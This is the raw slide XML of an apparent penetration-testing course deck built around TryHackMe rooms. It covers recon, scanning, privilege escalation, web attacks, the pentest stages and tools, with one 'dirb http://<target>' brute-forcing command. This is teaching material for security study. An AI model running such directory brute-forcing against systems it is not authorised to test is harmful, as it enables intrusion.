            <a:endParaRPr lang="en-US" sz="2292" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333004" y="5254526"/>
            <a:ext cx="2468860"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Career Preparation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1917" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333005" y="5681564"/>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Completing this path readies you for interviews and jobs in the field.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1542"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762125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493316" y="2149772"/>
            <a:ext cx="5200749" cy="440532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3458"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Getting Started Module Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695226" y="2801740"/>
            <a:ext cx="19050" cy="3671094"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="3109318"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="2960291"/>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7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="3013075"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="2942630"/>
            <a:ext cx="1833067"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Active Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="3247431"/>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Learning to gather information about target systems through direct interaction and scanning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="4062313"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="3913287"/>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12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="3966071"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="3895626"/>
            <a:ext cx="176212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Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="4200426"/>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Identifying potential security weaknesses in networks, systems, and applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="5015309"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="4866283"/>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17" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="4919068"/>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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="4848622"/>
            <a:ext cx="176212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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="5153422"/>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Techniques to gain higher-level access permissions on compromised systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844253" y="5968306"/>
            <a:ext cx="493316" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 310812"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="313E80"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546199" y="5819279"/>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22" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="5872063"/>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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="5801619"/>
            <a:ext cx="192851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Web Application Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="6106419"/>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Exploring common vulnerabilities and attack vectors in web-based applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="108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66D26-D32C-C2FD-EBE6-3D63BFA6DF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699713" y="248038"/>
            <a:ext cx="7063721" cy="1159200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 Rooms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fundamentals and Principles of Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18883F48-0930-E4B6-6A03-BC6F8C0DB9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572499" y="390832"/>
            <a:ext cx="3233585" cy="873612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="200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C6B36B90-E490-5CCA-6DD4-347BB9246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56" y="0"/>
            <a:ext cx="4063142" cy="1574310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FE0706D-F049-9E66-79B5-BE0F3BF6F311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543231" y="1798070"/>
            <a:ext cx="11093245" cy="4811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err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> Methodology: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>five stages of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Tools for web directory and file brute-forcing. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> http://&lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>CIA Triad: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Confidentiality, Integrity, Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Security Mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Authentication, Authorization, Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tools Covered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> http://&lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>OpenSSL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-EG" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Used for generating cryptographic keys, certificates, and encrypting data.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> enc -aes-256-cbc -in plaintext.txt -out encrypted.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34222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2165053"/>
            <a:ext cx="7173615"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Tutorial and Vulnversity Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031"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Tutorial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031"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Introduction to TryHackMe's platform and how to use virtual rooms for learning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274"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Vulnversity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274"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Hands-on practice with active recon, web app attacks, and privilege escalation techniques.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="158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571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="3469084"/>
            <a:ext cx="5469831"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Blue and Kenobi Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="4420593"/>
            <a:ext cx="5273179" cy="1540073"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5611"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938411" y="4638973"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938411" y="5083870"/>
            <a:ext cx="4836418"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Exploiting a Windows machine by leveraging common misconfigurations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6198891" y="4420593"/>
            <a:ext cx="5273179" cy="1540073"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5611"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417270" y="4638973"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kenobi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417270" y="5083870"/>
            <a:ext cx="4836418"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Linux exploitation focusing on Samba shares, vulnerable proftpd, and path variable manipulation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="158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9786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="391617"/>
            <a:ext cx="4837509" cy="444996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Advanced Exploitation Module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="1050231"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="1548607"/>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Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="1856482"/>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Advanced techniques for identifying weaknesses in target systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="2511524"/>
